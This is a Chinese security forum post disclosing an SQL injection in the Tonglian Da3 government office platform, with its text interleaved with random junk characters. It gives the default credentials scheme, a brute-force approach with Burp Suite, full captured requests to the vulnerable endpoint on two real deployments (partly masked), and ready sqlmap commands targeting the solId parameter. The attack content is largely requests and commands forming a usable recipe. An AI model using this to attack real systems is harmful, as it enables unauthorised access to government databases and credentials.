找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1943|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 A" u: j; u$ V5 X: D {6 ?0 j: M: X
! n }) e& E, o3 X( U- e

2 |. a: W& B! _" Z8 d* d* F

2 X7 F: P, a* ]/ ] 平台简介:2 B3 C I+ w: B

* N W% @5 v5 `

% x7 f* k* h' h7 x4 @   - A5 B5 [! D( c3 u* e

& O2 g; ^5 W- t9 I' R

& H* e" w& [3 E, `( l& P 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
% l* C2 t5 \/ I3 U2 u同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% b4 O: I7 ~1 W, U+ n: F# {" ~同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 V' a2 n: [! R. m7 L

& f0 ^! R \' |8 d. F9 ~

+ j# q( C% p/ m; ~/ S& o1 L  ' Z* v8 h( x9 Y( w: i& o. k5 S

0 l1 ]- \1 ~8 ^ h+ ]

3 b% l; E, B4 T0 c 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 1 \1 L" t* f$ _; U N1 E/ H

/ s9 v0 W9 Q. N6 C6 w' _: B5 S

/ p3 j: Z$ g1 @& X( R8 t0 ]   ' Z+ D# }$ G* |: }- |

: F' p4 w+ v2 C2 ?! U

4 T% D% _4 U- {5 U http://1.1.1.1:7197/cap-aco/#(案例2-). T0 s5 D4 f. u7 L* N1 i8 y0 E

. M8 \0 S) @' O9 c9 s

2 f n: @3 V% l2 `2 D http://www.XXOO.com (案例1-官网网站): w4 }1 m. ^/ n2 I

8 _. b+ g0 F7 Y% e

8 `" P) Y5 n: q   + z1 | D4 E% h3 V( h9 B

2 B7 A9 x7 ]8 x+ o7 H) }! e7 h+ n

5 z0 {0 R+ M, N0 q& l+ V" z 漏洞详情:9 V( N1 O* k# i4 M" w: g

1 l6 O8 j" H- A2 d: S9 O0 B

* N, E& i- F# X# S/ D  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 / p0 |" u+ Z. p' `5 B9 t; G

# q5 s' a+ m" a% j r) Z) {3 b2 ^

, H( i$ X' T9 b6 a4 [5 }      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:+ V; o9 X9 U7 e0 \1 @, N* U

% ^4 Y ~& t6 j4 g* f# |" [5 P2 A w

; s7 P7 z' `$ E( ^# s( Z E! }3 x* A  + c/ `9 o4 m; i

7 I0 q9 E Z' a( `" o

4 q1 E& F R% `2 I Z0 q+ _  ! F3 x8 V; }8 m( u* X9 Z: G

4 D0 s S6 `6 Z4 ^: y

3 S. M; [# r5 X% U6 R0 w5 |5 q2 t status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: . _# E! v& Z. ]$ {) U0 }) L

# D/ Y( z9 K) i. z4 n2 o. ^8 t

1 l! e# a# m( p" n 1、案例1-官方网站, R* c' E6 ?' y1 d7 w

f3 f, k* \6 T$ C( i

5 |; }8 ^; r% a, y GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 / X# C. w4 O) Z0 L+ o! H. D

% r9 O' c3 a5 W2 a4 K% H

) v$ V" W( \6 h1 ?$ e5 k Host: www.XXOO.com0 N$ E; c/ y" Y# V$ _

) c$ X4 A/ {- d- s$ ~" ^8 O0 H

& j6 }& t: A4 T/ l, V% H Proxy-Connection: Keep-Alive ! S) Z. q$ A' z1 L! [( V' S

. ?' ~ g" d5 @+ [6 J

$ r* F& c* I- V Accept: application/json, text/javascript, */*; q=0.01 4 M- o }+ f. n

# v3 g* I# p4 v2 Y+ z! t

- p5 t* L) Y9 Q+ p* r" Q Accept-Language: zh-CN ( e, h" f: p+ I& v8 I

5 k# N& A$ a- r

) g3 j W2 ~* r2 {$ G Content-Type: application/json , P# p- P) q2 K! h

* b; } F; a1 U; l* |

$ U1 I% L: S D User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko4 u/ S- J) M# F( y# o: x

* a; O9 I+ q0 L" B) b4 f# P

+ G# I8 h" A0 f, ^, d( X X-Requested-With: XMLHttpRequest# p+ Q/ O2 Y. ]

8 ^; F8 Q. q8 S1 q* L" z

! m: s" u" K9 C0 z. N. g Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002' r, L7 A [4 D0 T! ~3 u! a7 A( K5 m

) o8 Z3 o6 p, d5 _+ u" Y

" x7 N( [; R# p9 x/ I- d0 K. | Accept-Encoding: gzip, deflate, sdch6 x7 T* m, ^. [6 R4 x9 p

5 |: j0 d) ~5 y( v% m/ N7 S

6 @8 V2 X2 m9 L" C, }6 [ Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e" t$ ~- S8 ~+ T% N5 q

/ B( T/ {4 x0 r0 b8 {+ }

3 `& w- H/ m# }3 j' N8 @9 | 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 3 l+ y j b" a. m7 L B5 h

& W. i- E8 c3 Z) S z* Y- K

3 v$ ^2 B, |4 n2 T0 H' r* ~  7 a: T7 s+ Z. m! b2 \2 @$ ^6 n

# P* D/ w2 i9 ~5 |( W; ?

0 Z; G' d7 t! t" Q: e! Z; y  1 ?4 d: Q& Z7 a7 |9 e6 R: ]

$ d( }# E' \+ Y# K1 r2 u

2 ]+ _+ T6 V4 M6 A3 x: P  % h6 W' V; L: E6 u+ M9 S7 E

. l3 t. p x0 |# P9 O

, q' R5 ?6 M7 |' N/ O  + b8 a1 ~; o" J' s+ K7 Y

& a$ J. W7 ^4 H- S: ^' H

1 |( `0 \. {+ `+ D  ( L1 m* k, p* e/ x; `5 Z

3 i0 d7 i, w+ f$ P8 T. z9 d

1 J% `) t9 p7 |: I0 } 2、案例2-某天河云平台) V! [; | @7 m; ?# ]6 Z' G9 C5 \* e

# Q9 K% k6 s1 p6 C) z% F

+ B# M \2 @3 ?% u GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.19 u7 h9 _& |0 ]; n6 T" v9 `. Y

. g4 b9 U) O6 j/ `: o5 D

/ p8 r9 K) d1 w( { G Host: 1.1.1.:7197/ L7 r5 k$ J$ q) |9 ~# ^- _

8 v+ ]. e7 b/ z1 N" U& x) V

. S# Y( t- p/ c Accept: application/json, text/javascript, */*; q=0.01) X2 x/ d7 B" {' }8 E

; J; @4 a7 l# }' N

: z C3 G( P! B' i* V p9 D X-Requested-With: XMLHttpRequest4 J) F/ y: a* L0 A8 {" u

$ _$ n6 |( d: }

3 ~% G4 V0 g) H/ q/ a8 q7 k User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0( O% F/ ]8 e) k% M$ q7 u7 q9 R& X

, U; L* R1 J6 v

5 q+ y2 ]! K# V0 f5 K% z3 Q Content-Type: application/json 1 ?$ _ _, x6 D' K) r$ S9 ~5 D9 m

% O6 G4 ~2 ]' G/ R. ^& }3 l) Q

; Q `2 U: ]$ [; k c Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008: E3 h1 K* t8 [) K" q

4 G) m0 ~4 R& ~* w1 {

# I9 K9 @* u0 \' p8 T5 D) V9 }4 c Accept-Language: zh-CN,zh;q=0.8% q! f& V# N1 k! G9 [/ }

+ H' [: G; Y( N e# @

9 ]' ^! y: a% B$ P# U* k/ A Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 w: \3 Z3 e& ~. c J0 \, g k" X

3 H( \' _% h8 [. q* l! G x

5 R2 a- v" u- a, [3 D( p1 e# f Connection: close' k' t* \/ x8 L3 [, |2 C+ l. X

, ^1 ]6 R2 Y) g8 @, b

# h+ `' C0 Z6 D+ y& ~& z# } 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ ^8 M5 Y% B5 J/ ~4 @7 z( a

0 G; B" J9 E* S& e2 z

a3 z: ~0 R e& L4 Y, f   % i0 J3 b% { l9 o& [+ C; V

. M. s" `; g; A3 F

! \/ P/ A% \( v! u" C! @- F, i* W
1 @- w F& L7 a4 J

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表